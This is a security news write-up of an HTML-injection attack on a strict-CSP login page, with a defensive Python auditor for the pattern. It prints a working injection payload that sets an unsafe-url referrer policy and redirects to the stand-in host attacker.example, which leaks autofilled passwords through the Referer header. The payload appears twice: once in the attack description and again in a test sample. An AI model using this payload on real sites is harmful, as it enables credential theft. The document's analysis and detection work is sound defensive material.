Password theft via HTML injection under a strict CSP

AFINE analyzed an attack on an authentication page protected by a strict CSP. Scripts, styles, images, and external requests were blocked, making classic XSS impossible. However, HTML injection was still available.
The attacker injects a form containing email and password fields. The browser's password manager autofills them with the victim's stored credentials. When the user submits the form, the credentials are sent via a GET request to the legitimate application and become part of the URL.
The remaining challenge is exfiltration. Since CSP blocks direct requests to external domains, the attack abuses the Referer header. The injected HTML sets a permissive referrer policy and immediately redirects the victim to an attacker-controlled site:
```html
<meta name="referrer" content="unsafe-url">
<meta http-equiv="Refresh" content="0;url=https://attacker.example">
```
As a result, the browser follows the redirect and includes the full URL of the previous page in the Referer header. Since that URL contains the victim's credentials, they are disclosed to the attacker.
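The chain above has three observable indicators in the served HTML: a referrer policy that sends the full URL cross-origin, a meta refresh to a foreign origin, and a form with a password field that submits via GET. The following audit, an added example that is not AFINE's code, flags each of them so a defender can check login responses (for example in a CI check or a WAF response hook). The page origin `https://app.example` and both HTML samples are constructed for the example.

```python
"""Audit an HTML response for the HTML-injection / Referer-leak pattern.

Added example, not part of the AFINE write-up. Flags three indicators:
  - a <meta name="referrer"> policy that discloses the full URL cross-origin,
  - a <meta http-equiv="refresh"> pointing at another origin,
  - a <form> containing a password field that would submit via GET
    (putting the credential into the URL and thus into the Referer).
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Policies under which a cross-origin navigation carries the full previous URL
# (no-referrer-when-downgrade does so for HTTPS -> HTTPS navigations).
FULL_URL_POLICIES = {"unsafe-url", "no-referrer-when-downgrade"}


def refresh_target(content: str):
    """Extract the URL from a refresh value such as '0;url=https://x.example'."""
    for part in content.split(";")[1:]:
        part = part.strip()
        if part.lower().startswith("url="):
            return part[4:].strip().strip("'\"")
    return None


def origin_of(url: str):
    """Return scheme://host for absolute URLs, None for relative ones."""
    parts = urlsplit(url)
    if parts.scheme and parts.netloc:
        return f"{parts.scheme}://{parts.netloc}".lower()
    return None


class InjectionAuditor(HTMLParser):
    def __init__(self, page_origin: str):
        super().__init__()
        self.page_origin = page_origin.lower()
        self.findings = []          # list of (indicator, detail)
        self._forms = []            # stack of open forms

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta":
            if (a.get("name", "").lower() == "referrer"
                    and a.get("content", "").strip().lower() in FULL_URL_POLICIES):
                self.findings.append(("permissive-referrer", a["content"]))
            if a.get("http-equiv", "").lower() == "refresh":
                url = refresh_target(a.get("content", ""))
                if url and origin_of(url) not in (None, self.page_origin):
                    self.findings.append(("external-refresh", url))
        elif tag == "form":
            # A form without an explicit method submits via GET.
            self._forms.append({"method": a.get("method", "get").lower(),
                                "password": False})
        elif tag == "input" and a.get("type", "").lower() == "password" and self._forms:
            self._forms[-1]["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._forms:
            form = self._forms.pop()
            if form["password"] and form["method"] == "get":
                self.findings.append(("password-in-get-form", form["method"]))


def audit(html: str, page_origin: str):
    """Return the list of (indicator, detail) findings for one HTML document."""
    auditor = InjectionAuditor(page_origin)
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed sample mirroring the injected fragment described in the write-up.
SAMPLE_HTML = """
<html><body><h1>Sign in</h1>
<form action="/login">
  <input type="email" name="email">
  <input type="password" name="password">
</form>
<meta name="referrer" content="unsafe-url">
<meta http-equiv="Refresh" content="0;url=https://attacker.example">
</body></html>
"""

# Constructed sample of a login page that does not exhibit the pattern.
CLEAN_HTML = """
<html><head><meta name="referrer" content="no-referrer"></head><body>
<form method="post" action="/login">
  <input type="email" name="email">
  <input type="password" name="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_HTML), ("clean", CLEAN_HTML)):
        print(name, audit(doc, "https://app.example"))
```

Any hit on a page that is supposed to be a plain login form is worth treating as a content-integrity problem rather than a referrer-policy tweak: the durable fixes are to keep credentials out of URLs (POST-only login handling, rejecting credential parameters on GET) and to prevent untrusted markup from reaching the page at all.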
Vendors
Afine
Published
2026-06-08, 14:47